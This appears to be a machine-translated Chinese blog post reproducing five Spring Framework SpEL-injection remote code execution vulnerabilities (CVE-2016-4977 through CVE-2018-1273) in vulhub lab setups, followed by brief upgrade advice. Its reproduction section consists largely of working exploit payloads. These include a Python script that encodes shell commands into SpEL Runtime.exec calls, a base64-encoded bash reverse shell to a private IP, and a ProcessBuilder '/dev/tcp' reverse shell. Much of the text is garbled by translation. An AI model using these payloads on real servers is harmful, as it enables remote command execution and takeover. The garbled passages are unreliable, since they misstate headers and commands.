Spring Framework vulnerability reproduce hodgepodge! ! !
寻了半生的春天 你一笑 便是了
General overview:
- Spring Framework is an open source, the core is inverted control (IoC) and the facing section (AOP). Briefly, Spring is a layered JavaSE / EE full-stack (stop) lightweight open source framework. It simply is to create objects called by the previous programmer new constructor, to become referred Spring to create objects. Struts 2 framework analogy most of the vulnerabilities are due to OGNL, but since sping introduced SpEL, also caused a lot of security holes, that is what is beneficial and disadvantages.
- The mainly reproduction (vulhub a key building) for several vulnerabilities, the vulnerability is mainly due to the expression SpEL generated, an attacker can inject malicious SpEL expression to execute arbitrary commands.
Vulnerability version
- Spring Security OAuth2 Remote Command Execution Vulnerability (CVE-2016-4977)
Spring Security OAuth 2.0 – 2.0.9
Spring Security OAuth 1.0 – 1.0.5
- Spring WebFlow Remote Code Execution Vulnerability (CVE-2017-4971)
Spring Web Flow 2.4.0-2.4.4
- Spring Data Rest Remote Command Execution Vulnerability (CVE-2017-8046)
Spring Data REST versions < 2.5.12, 2.6.7, 3.0 RC3
Spring Boot version < 2.0.0M4
Spring Data release trains < Kay-RC3
- Spring Messaging Remote Command Execution Vulnerability (CVE-2018-1270)
Spring Framework 5.0 -5.0.4
Spring Framework 4.3 - 4.3.14
- Spring Data Commons Remote Command Execution Vulnerability (CVE-2018-1273)
Spring Data Commons 1.13 - 1.13.10
Spring Data Commons 2.0 - 2.0.5
Vulnerability Overview:
-
Spring Security OAuth authentication provide security support for the Spring Framework module, divided into the authorization service Authorization Service. Resource Service Resource Service. This vulnerability is mainly used by the user when an error Whitelabel views to deal with, the attacker in the case of the authorized under the command can be executed remotely by constructing a malicious SpEL expression.
-
Spring WebFlow built on Spring MVC, allows Web application "process." Process encapsulates a series of steps to guide the user to perform certain business tasks. Its optimal position stateful Web applications with a controlled navigation function, such as shopping logic, adding confirmation step to form the like. If we control the field when the data binding expressions to construct a malicious SpEL remote execution of commands.
-
Spring Data is more abstract data access. With it, developers further liberation from the data layer, more focus on business logic. Spring Data REST is a built on Spring Data, to help developers more easily develop REST-style Web services. In Patch method REST API, the value of the path is passed setValue, lead to the execution of malicious SpEL expression, triggering remote command execution vulnerability.
-
Messaging spring providing message support spring framework, which is the upper layer protocol STOMP, based on the underlying communication SockJS,
with STOMP protocol combined data into a text stream, simply by sending a text stream protocol sockjs, sockjs selects a suitable channel: websocket (NEW) or ajax (OLD) into communication with the backend. Since the selector SpEL written expression, and use StandardEvaluationContext parse (permissions too), resulting command execution vulnerability. -
Spring Data is used to simplify database access, and support for open source cloud services framework, Spring Data Commons there is an important concept: Spring Data Repository abstract. Use Spring Data Repository can greatly reduce the code data access layer. When the user of the relevant web properties when Spring-data of the user input parameters for automatic matching in the project, key values will form the form submitted by the user as expressions SpEL injection, inject malicious attacker can expression SpEL to execute arbitrary commands.
Vulnerability reproduction:
- Spring Security OAuth2 Remote Command Execution Vulnerability (CVE-2016-4977)
vulnerability can be triggered both:
oauth/authorize?response_type=${2*2}&client_id=acme&scope=openid&redirect_uri=http://test
oauth/authorize?response_type=token&client_id=acme&redirect_uri=${2*2}
then generate POC rebound shell, the shell statement needs to bounce into SpEL statement
#!/usr/bin/env python
message = input('Enter message to encode:')
poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])
for ch in message[1:]:
poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)
poc += ')}'
print(poc)
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuMTAyLzg4ODggMD4mMQo=}|{base64,-d}|{bash,-i}
poc After generating SpEL expression, the expression can bring success getshell.
-
Spring WebFlow Remote Code Execution Vulnerability (CVE-2017-4971)
In a simple example spring-webflow to the official, ordering the hotel, and then fill out the information click on the "Process" (From the beginning, WebFlow already running)
Then click "confirm", after capture, add a rebound shell parameters and returns 500, you can successfully getshell
_(new java.lang.ProcessBuilder("bash","-c","bash -i >& /dev/tcp/ip/端口 0>&1")).start()=hellowrod(要url编码,因为有特殊符号)
-
Spring Data Rest Remote Command Execution Vulnerability (CVE-2017-8046)
First, note a few:
1.Content the Type-: file application / json json-Patch +
2. json array of data must be requested
data submitted 3.JSON Patch method must include a path member for positioning data, must also contain op members, optional values are as follows:on meaning add adding data remove delete replace modify move mobile copy copy test Testing whether given data is equal to the designated position data For Person added data above, it can be modified outside the lastName property, request the following data:
[{ "op": "replace", "path": "/lastName", "value": "hellocat" }]
Then payload structure, the value of the path expression SpEL,
[{ "op": "replace", "path": "T(spel表达式)/lastname", "value": "hellocat" }]
Ethereal modify OPTIONS, view with the type and method allows the request.
The patch replaced by a rebound shell statement, we can successfully getshell.
-
Spring Messaging Remote Command Execution Vulnerability (CVE-2018-1270)
to build: git clone https://github.com/spring-guides/gs-messaging-stomp-websocket
cd Complete
./mvnw the Spring-the Boot: RUN
build successful, then turn connect, capture and then add the payload\nselector:new java.lang.ProcessBuilder("touch /tmp/sucesss").start()can be, then you can successfully execute the command
-
Spring Data Commons Remote Command Execution Vulnerability (CVE-2018-1273)
first in the login page capture, transmit repeater
payload:username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=
Then modify the username, modified payload data transmission, you can see the successful execution of the command.
Bug fixes:
-
Spring Security OAuth2 Remote Command Execution Vulnerability (CVE-2016-4977)
1. Disable the production environment Whitelabel error page
2. Upgrade +++ -
Spring WebFlow remote code execution vulnerability (CVE-2017-4971)
1. always recommended in view state explicit data binding declaration, to prevent form submission should not be set on the target object field may be set arbitrarily.
2. Upgrade +++ -
Spring Data Rest Remote Command Execution Vulnerability (CVE-2017-8046)
upgrade +++ -
Spring Messaging Remote Command Execution Vulnerability (CVE-2018-1270)
upgrade +++ -
Spring Data Commons Remote Command Execution Vulnerability (CVE-2018-1273)
upgrade +++Meng new one, the rest is very long, please advise.
